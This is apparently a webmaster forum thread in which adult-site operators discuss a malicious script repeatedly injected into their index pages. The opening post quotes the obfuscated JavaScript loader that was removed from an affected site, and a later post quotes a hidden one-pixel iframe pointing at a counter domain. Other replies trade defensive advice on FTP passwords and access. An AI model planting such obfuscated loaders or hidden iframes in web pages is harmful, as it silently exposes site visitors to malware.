Virus alert on new sologirl site

[maxxxxx]

Checked out a new sologirl site which gave me a virus alert: "signature of js/shellcode virus found" which seems to be some kind of trojan. Contacted the owner who said that he wasn't aware of any javascript on his site. However, this piece of javascript was removed from his site minutes after I had contacted him:

<script language="JavaScript">
e = '0x00' + '29';str1 = "%92%CA%C1%DC%B6%DB%DA%D1%C2%CD%95%88%DC%C1%DB%C1% C8%C1%C2%C1%DA%D1%90%CE%C1%CA%CA%CD%C4%88%94%92%C1 %CC%D8%C9%C5%CD%B6%DB%D8%CB%95%88%CE%DA%DA%C6%90%8 7%87%CA%C4%DC%85%CB%C7%DD%C4%DA%CD%D8%84%CB%C7%C5% 87%CA%C4%DC%9B%87%88%B6%DF%C1%CA%DA%CE%95%99%B6%CE %CD%C1%CF%CE%DA%95%99%94%92%87%C1%CC%D8%C9%C5%CD%9 4%92%87%CA%C1%DC%94%B6%A5%A0";str=tmp='';for(i=0;i <str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</script>

Can anyone do something with this? Any idea what this js/shellcode virus is? Just trying to find out what's going on.

[Huskie]

Thats shitty

[Quickdraw]

Another one that bvelongs to dnv-counter--
<div style="visibilitydden"><i frame src="ht://dnv- counter.com/dnv3/" width=1 height=1></iframe></div>

[maxxxxx]

Thanks - any problems with that? Or was the virus alert something else?

[Quickdraw]

oh yeah, it's trouble for sure. There are a lot of threads about this. Hacking 'open' scripts and inserting the code(s) into templates, etc..

[Shoehorn!]

What site did you find that on?

[maxxxxx]

Quote:

Originally Posted by Shoehorn!

What site did you find that on?

I leave the site away. It's gone now, so I can't prove it anyway that it was ever there.

[maxxxxx]

Quote:

Originally Posted by Quickdraw

oh yeah, it's trouble for sure. There are a lot of threads about this. Hacking 'open' scripts and inserting the code(s) into templates, etc..

Quickdraw, you are the expert - can you point me to any of those threads or other reading stuff about it? Much appreciated - thanks!

[PornAddict]

I've had that script installed on a couple of my sites and have been trying to track down how it's getting done.

The only active scripts I have installed on my server are those from NATS, CCbill and PayCom. I've contacted each, along with my host and no one can point me to what's happening.

Anyone got any info?

- PornAddict

[maxxxxx]

Quote:

Originally Posted by PornAddict

I've had that script installed on a couple of my sites and have been trying to track down how it's getting done.

The only active scripts I have installed on my server are those from NATS, CCbill and PayCom. I've contacted each, along with my host and no one can point me to what's happening.

Anyone got any info?

- PornAddict

You mean it got added to your sites from outside? Server hacked? Wow...

[Quickdraw]

http://www.google.com/search?hl=en&l...dnv-counter%22

As GFY search is just about worthless, this google link is the best I can do.

Yes, I believe for the most part, that these scripts are part of a hack and not the webmaster doing it on purpose. There are several webmasters on this board that have been hit.

There was a poster the other day that had a bit of info n this company, but I don't remember the username, or the post.. so maybe the bump will let them find you

[djroof]

I have the same on my site juicydevils.com yes this is huge shitty... u delete it and after time is there again...

[PornAddict]

Quote:

Originally Posted by maxxxxx

You mean it got added to your sites from outside? Server hacked? Wow...

That's exactly what I'm talking about!

It just seems like the script is added every once in a while. So far, 3 times in the past 2 months I've found it on the same 2-3 sites and no one can seem to find the problem. I always get the standard, "it's not us... it must be someone else's scripts" reply.

I wish there were something more I can do but I'm screwed at the moment.

- PornAddict

[Quickdraw]

Quote:

Originally Posted by djroof

I have the same on my site juicydevils.com yes this is huge shitty... u delete it and after time is there again...

Check your scripts' template files, if you have any.

[PornAddict]

Quote:

Originally Posted by Quickdraw

Check your scripts' template files, if you have any.

Oh... another thing to point out is that they only seem to show up on the index files, no tour or join pages. The index files aren't templates, either... they're done manually and uploaded via ftp. So somehow, they can add this bit of code into my pages once they're uploaded.

- PornAddict

[V_RocKs]

Quote:

Originally Posted by PornAddict

Oh... another thing to point out is that they only seem to show up on the index files, no tour or join pages. The index files aren't templates, either... they're done manually and uploaded via ftp. So somehow, they can add this bit of code into my pages once they're uploaded.

- PornAddict

Usually they upload their own httpd... then run it... so it is added to the index file on the fly... the code won't actually be in the index file.

[Ray@TastyDollars]

We had that code on two of our TGP's. ICQ me if you want details, 161 375 873

thx,
Ray

[frank7799]

Had the same problem some days ago and discussed it on another board. I remember that the same script problem was brought to GFY because I posted in that thread.

[maxxxxx]

Quote:

Originally Posted by PornAddict

That's exactly what I'm talking about!

It just seems like the script is added every once in a while. So far, 3 times in the past 2 months I've found it on the same 2-3 sites and no one can seem to find the problem. I always get the standard, "it's not us... it must be someone else's scripts" reply.

I wish there were something more I can do but I'm screwed at the moment.

- PornAddict

PornAddict, what did your hosting company say?

[maxxxxx]

Found it:


http://www.gfy.com/showthread.php?t=...ighlight=virus

[PornAddict]

Quote:

Originally Posted by maxxxxx

PornAddict, what did your hosting company say?

When I contacted them, I told them that I think my server has been hacked and if they can look around to see what happened. I told them about how the javascript was being installed on certain files.

The tech did a search and said that there was no actual hack but to check my scripts. That was it... I don't know which scripts or anything. All I do know is that I currently only have 4 scripts running on that server (ccbill, paycom, pennywize and nats).

It seems like they keep attacking the same 3 sites. What's weird is that the sites that are targeted are ones that were set up via paycom. I then contacted paycom because I remembered seeing a post on here about paycom's info being compromised and their scripts left open. It seemed like the case was cracked. I had paycom check around and nothing in their end (on my server) seemed to be modified, but they uploaded a fresh script regardless just to see. It has then happened again.

So, that's kinda where I am now. Still searching for an answer and a solution on how to prevent this from happening.

I don't know what the script does, but I know my mcafee picks it up and deletes it immediately... however, I don't know what it's doing to those without virus protection.

The way I normally catch it is when I ftp, I see the dates on which certain files were modified. There's no reason to ever update my index file (since it's just a standard warning / entrance page) so when I see newer dates, I know something is up.

- PornAddict

[frank7799]

I had the hosting company looking for attacks, too. They didn´t find any. I don´t run scripts except a tgp script, but that site wasn´t involved in the attack.

The only way to get it on my server was using ftp, I think. So I changed logins and passwords and limited ftp to a single account. Until now I didn´t get the script again.

[E$_manager]

that is so nasty!

[CaptainHowdy]

Fuckers !!

[SmokeyTheBear]

theres quite a few different script being hit , one of the noteable is wordpress , and once a site is sompromised you might as well consider the whole server compromised.. if you are affected and your host cant do anything or wont hit me up on icq.

[DutchTeenCash]

yeah fucking js script had it too - hope youll solve it soon

[maxxxxx]

There's more on http://www.******************/index.php?showtopic=2559
Isn't it possible to take that dnv-counter.com domain out?

[V_RocKs]

Quote:

Originally Posted by PornAddict

When I contacted them, I told them that I think my server has been hacked and if they can look around to see what happened. I told them about how the javascript was being installed on certain files.

The tech did a search and said that there was no actual hack but to check my scripts. That was it... I don't know which scripts or anything. All I do know is that I currently only have 4 scripts running on that server (ccbill, paycom, pennywize and nats).

It seems like they keep attacking the same 3 sites. What's weird is that the sites that are targeted are ones that were set up via paycom. I then contacted paycom because I remembered seeing a post on here about paycom's info being compromised and their scripts left open. It seemed like the case was cracked. I had paycom check around and nothing in their end (on my server) seemed to be modified, but they uploaded a fresh script regardless just to see. It has then happened again.

So, that's kinda where I am now. Still searching for an answer and a solution on how to prevent this from happening.

I don't know what the script does, but I know my mcafee picks it up and deletes it immediately... however, I don't know what it's doing to those without virus protection.

The way I normally catch it is when I ftp, I see the dates on which certain files were modified. There's no reason to ever update my index file (since it's just a standard warning / entrance page) so when I see newer dates, I know something is up.

- PornAddict

ICQ me and I can check it out for you. 1611-24816

[NastyNed]

First, I want to thank Maxxxxx for protecting my identity... it was on one of my sites that he found this shit. I talked to my host... and he didn't want to implicate anybody... but he said that when CC Bill's system was breached a while back (and no one's blaming CC Bill for any of this - it's the asshole hacks who perpetrated it), that this problem started occurring on about 95% of their sites... possibly from the fact that CC Bill has FTP access to all of our servers. This shit keeps coming back because the dickheads keep loading it onto your server every 2 or 3 weeks, or so. His recommendation was check your files on your local host... clean them out... and make a habit of uploading your clean files every day... and also...

...CHANGE YOUR FTP PASSWORD!!!

When you put up a new site with ANY webmerchant, change your/their password until you get through the approval process... once you get approved... change it back.

That should stop these pricks right in their tracks.
(until they figure out something new)

Make sense?

[V_RocKs]

Also install FTP on a non standard port... They come in via scripts and it is all automated... Also, don't give your processor FTP access. Or allow them access on a seperate account you created just for them and then disable it after the initial setup.

[chase]

Quote:

Originally Posted by SmokeyTheBear

theres quite a few different script being hit , one of the noteable is wordpress , and once a site is sompromised you might as well consider the whole server compromised.. if you are affected and your host cant do anything or wont hit me up on icq.

what if your wordpress install is in a member's area?